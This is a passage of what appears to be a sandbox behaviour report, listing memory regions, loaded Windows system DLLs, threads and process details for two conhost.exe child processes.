"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3552 start_va = 0xd2fd100000 end_va = 0xd2fd13ffff entry_point = 0x0 region_type = private name = "private_0x000000d2fd100000" filename = "" Region: id = 3553 start_va = 0xd2fd140000 end_va = 0xd2fd140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d2fd140000" filename = "" Region: id = 3554 start_va = 0xd2fd150000 end_va = 0xd2fd156fff entry_point = 0x0 region_type = private name = "private_0x000000d2fd150000" filename = "" Region: id = 3555 start_va = 0xd2fd160000 end_va = 0xd2fd19ffff entry_point = 0x0 region_type = private name = "private_0x000000d2fd160000" filename = "" Region: id = 3556 start_va = 0xd2fd1a0000 end_va = 0xd2fd1a0fff entry_point = 0x0 region_type = private name = "private_0x000000d2fd1a0000" filename = "" Region: id = 3557 start_va = 0xd2fd1b0000 end_va = 0xd2fd1b0fff entry_point = 0x0 region_type = private name = "private_0x000000d2fd1b0000" filename = "" Region: id = 3558 start_va = 0xd2fd2c0000 end_va = 0xd2fd447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d2fd2c0000" filename = "" Region: id = 3559 start_va = 0xd2fd480000 end_va = 0xd2fd48ffff entry_point = 0x0 region_type = private name = "private_0x000000d2fd480000" filename = "" Region: id = 3560 start_va = 0xd2fd490000 end_va = 0xd2fd610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d2fd490000" filename = "" Region: id = 3561 start_va = 0xd2fd620000 end_va = 0xd2fea1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d2fd620000" filename = "" Region: id = 3562 start_va = 0x7ff6c3b90000 end_va = 0x7ff6c3c8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3b90000" filename = "" Region: id = 3563 start_va = 0x7ff6c3cb9000 end_va = 0x7ff6c3cbafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3cb9000" filename = "" Region: id = 3564 start_va = 0x7ff6c3cbb000 end_va = 0x7ff6c3cbcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3cbb000" filename = "" Region: id = 3565 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3566 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3567 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3568 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3569 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3570 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3571 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3572 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3573 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3574 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3575 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3576 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4822 start_va = 0xd2fea20000 end_va = 0xd2fea5ffff entry_point = 0x0 region_type = private name = "private_0x000000d2fea20000" filename = "" Region: id = 4823 start_va = 0xd2feac0000 end_va = 0xd2feacffff entry_point = 0x0 region_type = private name = "private_0x000000d2feac0000" filename = "" Region: id = 4824 start_va = 0xd2feb90000 end_va = 0xd2feb9ffff entry_point = 0x0 region_type = private name = "private_0x000000d2feb90000" filename = "" Region: id = 4825 start_va = 0xd2feba0000 end_va = 0xd2feed6fff entry_point = 0xd2feba0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4826 start_va = 0xd2feee0000 end_va = 0xd2ff0f0fff entry_point = 0x0 region_type = private name = "private_0x000000d2feee0000" filename = "" Region: id = 4827 start_va = 0xd2ff100000 end_va = 0xd2ff311fff entry_point = 0x0 region_type = private name = "private_0x000000d2ff100000" filename = "" Region: id = 4828 start_va = 0xd2ff320000 end_va = 0xd2ff435fff entry_point = 0x0 region_type = private name = "private_0x000000d2ff320000" filename = "" Region: id = 4829 start_va = 0xd2ff440000 end_va = 0xd2ff65efff entry_point = 0x0 region_type = private name = "private_0x000000d2ff440000" filename = "" Region: id = 4830 start_va = 0xd2ff660000 end_va = 0xd2ff76bfff entry_point = 0x0 region_type = private name = "private_0x000000d2ff660000" filename = "" Region: id = 4831 start_va = 0x7ff6c3cb7000 end_va = 0x7ff6c3cb8fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3cb7000" filename = "" Region: id = 4832 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4833 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4834 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4835 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4836 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4837 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4838 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4839 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4840 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 129 os_tid = 0xef4 Thread: id = 174 os_tid = 0x250 Thread: id = 209 os_tid = 0x1048 Thread: id = 244 os_tid = 0x10d4 Thread: id = 314 os_tid = 0x1218 Process: id = "99" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf7a0000" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0xd94" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2075 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2076 start_va = 0x4b2aec0000 end_va = 0x4b2aedffff entry_point = 0x0 region_type = private name = "private_0x0000004b2aec0000" filename = "" Region: id = 2077 start_va = 0x4b2aee0000 end_va = 0x4b2aef3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004b2aee0000" filename = "" Region: id = 2078 start_va = 0x4b2af00000 end_va = 0x4b2af3ffff entry_point = 0x0 region_type = private name = "private_0x0000004b2af00000" filename = "" Region: id = 2079 start_va = 0x7df5ffa40000 end_va = 0x7ff5ffa3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa40000" filename = "" Region: id = 2080 start_va = 0x7ff6c4690000 end_va = 0x7ff6c46b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4690000" filename = "" Region: id = 2081 start_va = 0x7ff6c46b7000 end_va = 0x7ff6c46b7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46b7000" filename = "" Region: id = 2082 start_va = 0x7ff6c46be000 end_va = 0x7ff6c46bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46be000" filename = "" Region: id = 2083 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2084 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2085 start_va = 0x4b2afb0000 end_va = 0x4b2b0affff entry_point = 0x0 region_type = private name = "private_0x0000004b2afb0000" filename = "" Region: id = 2086 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2087 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2900 start_va = 0x4b2aec0000 end_va = 0x4b2aecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004b2aec0000" filename = "" Region: id = 2901 start_va = 0x4b2aed0000 end_va = 0x4b2aed6fff entry_point = 0x0 region_type = private name = "private_0x0000004b2aed0000" filename = "" Region: id = 2902 start_va = 0x4b2af40000 end_va = 0x4b2af7ffff entry_point = 0x0 region_type = private name = "private_0x0000004b2af40000" filename = "" Region: id = 2903 start_va = 0x4b2af80000 end_va = 0x4b2af80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004b2af80000" filename = "" Region: id = 2904 start_va = 0x4b2af90000 end_va = 0x4b2af96fff entry_point = 0x0 region_type = private name = "private_0x0000004b2af90000" filename = "" Region: id = 2905 start_va = 0x4b2afa0000 end_va = 0x4b2afa0fff entry_point = 0x0 region_type = private name = "private_0x0000004b2afa0000" filename = "" Region: id = 2906 start_va = 0x4b2b0b0000 end_va = 0x4b2b16dfff entry_point = 0x4b2b0b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2907 start_va = 0x4b2b170000 end_va = 0x4b2b170fff entry_point = 0x0 region_type = private name = "private_0x0000004b2b170000" filename = "" Region: id = 2908 start_va = 0x4b2b1c0000 end_va = 0x4b2b1cffff entry_point = 0x0 region_type = private name = "private_0x0000004b2b1c0000" filename = "" Region: id = 2909 start_va = 0x4b2b1d0000 end_va = 0x4b2b357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004b2b1d0000" filename = "" Region: id = 2910 start_va = 0x4b2b360000 end_va = 0x4b2b4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004b2b360000" filename = "" Region: id = 2911 start_va = 0x4b2b4f0000 end_va = 0x4b2c8effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004b2b4f0000" filename = "" Region: id = 2912 start_va = 0x7ff6c4590000 end_va = 0x7ff6c468ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4590000" filename = "" Region: id = 2913 start_va = 0x7ff6c46bc000 end_va = 0x7ff6c46bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46bc000" filename = "" Region: id = 2914 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2915 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2916 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2917 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2918 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2919 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2920 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2921 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2922 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2923 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2924 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2925 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4550 start_va = 0x4b2b180000 end_va = 0x4b2b18ffff entry_point = 0x0 region_type = private name = "private_0x0000004b2b180000" filename = "" Region: id = 4551 start_va = 0x4b2c8f0000 end_va = 0x4b2c92ffff entry_point = 0x0 region_type = private name = "private_0x0000004b2c8f0000" filename = "" Region: id = 4552 start_va = 0x4b2c930000 end_va = 0x4b2ca42fff entry_point = 0x0 region_type = private name = "private_0x0000004b2c930000" filename = "" Region: id = 4553 start_va = 0x4b2cac0000 end_va = 0x4b2cacffff entry_point = 0x0 region_type = private name = "private_0x0000004b2cac0000" filename = "" Region: id = 4554 start_va = 0x4b2cad0000 end_va = 0x4b2ce06fff entry_point = 0x4b2cad0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4555 start_va = 0x4b2ce10000 end_va = 0x4b2d021fff entry_point = 0x0 region_type = private name = "private_0x0000004b2ce10000" filename = "" Region: id = 4556 start_va = 0x4b2d030000 end_va = 0x4b2d244fff entry_point = 0x0 region_type = private name = "private_0x0000004b2d030000" filename = "" Region: id = 4557 start_va = 0x4b2d250000 end_va = 0x4b2d46cfff entry_point = 0x0 region_type = private name = "private_0x0000004b2d250000" filename = "" Region: id = 4558 start_va = 0x4b2d470000 end_va = 0x4b2d585fff entry_point = 0x0 region_type = private name = "private_0x0000004b2d470000" filename = "" Region: id = 4559 start_va = 0x7ff6c46ba000 end_va = 0x7ff6c46bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46ba000" filename = "" Region: id = 4560 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4561 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4562 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4563 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4564 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4565 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4566 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4567 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4568 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 130 os_tid = 0xefc Thread: id = 175 os_tid = 0x42c Thread: id = 221 os_tid = 0x1078 Thread: id = 301 os_tid = 0x11e4 Process: id = "100" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xb369000" os_pid = "0xf00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "57" os_parent_pid = "0xd9c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2088 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2089 start_va = 0x6990940000 end_va = 0x699095ffff entry_point = 0x0 region_type = private name = "private_0x0000006990940000" filename = "" Region: id = 2090 start_va = 0x6990960000 end_va = 0x6990973fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006990960000" filename = "" Region: id = 2091 start_va = 0x6990980000 end_va = 0x69909bffff entry_point = 0x0 region_type = private name = "private_0x0000006990980000" filename = "" Region: id = 2092 start_va = 0x7df5ffb20000 end_va = 0x7ff5ffb1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb20000" filename = "" Region: id = 2093 start_va = 0x7ff6c4240000 end_va = 0x7ff6c4262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4240000" filename = "" Region: id = 2094 start_va = 0x7ff6c426d000 end_va = 0x7ff6c426efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c426d000" filename = "" Region: id = 2095 start_va = 0x7ff6c426f000 end_va = 0x7ff6c426ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c426f000" filename = "" Region: id = 2096 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2097 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2098 start_va = 0x6990a10000 end_va = 0x6990b0ffff entry_point = 0x0 region_type = private name = "private_0x0000006990a10000" filename = "" Region: id = 2099 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2100 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2926 start_va = 0x6990940000 end_va = 0x699094ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006990940000" filename = "" Region: id = 2927 start_va = 0x6990950000 end_va = 0x6990956fff entry_point = 0x0 region_type = private name = "private_0x0000006990950000" filename = "" Region: id = 2928 start_va = 0x69909c0000 end_va = 0x69909fffff entry_point = 0x0 region_type = private name = "private_0x00000069909c0000" filename = "" Region: id = 2929 start_va = 0x6990a00000 end_va = 0x6990a00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006990a00000" filename = "" Region: id = 2930 start_va = 0x6990b10000 end_va = 0x6990bcdfff entry_point = 0x6990b10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2931 start_va = 0x6990bd0000 end_va = 0x6990bd6fff entry_point = 0x0 region_type = private name = "private_0x0000006990bd0000" filename = "" Region: id = 2932 start_va = 0x6990be0000 end_va = 0x6990be0fff entry_point = 0x0 region_type = private name = "private_0x0000006990be0000" filename = "" Region: id = 2933 start_va = 0x6990bf0000 end_va = 0x6990bf0fff entry_point = 0x0 region_type = private name = "private_0x0000006990bf0000" filename = "" Region: id = 2934 start_va = 0x6990ca0000 end_va = 0x6990caffff entry_point = 0x0 region_type = private name = "private_0x0000006990ca0000" filename = "" Region: id = 2935 start_va = 0x6990cb0000 end_va = 0x6990e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006990cb0000" filename = "" Region: id = 2936 start_va = 0x6990e40000 end_va = 0x6990fc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006990e40000" filename = "" Region: id = 2937 start_va = 0x6990fd0000 end_va = 0x69923cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006990fd0000" filename = "" Region: id = 2938 start_va = 0x7ff6c4140000 end_va = 0x7ff6c423ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4140000" filename = "" Region: id = 2939 start_va = 0x7ff6c426b000 end_va = 0x7ff6c426cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c426b000" filename = "" Region: id = 2940 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2941 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2942 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2943 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2944 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2945 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2946 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2947 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2948 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = 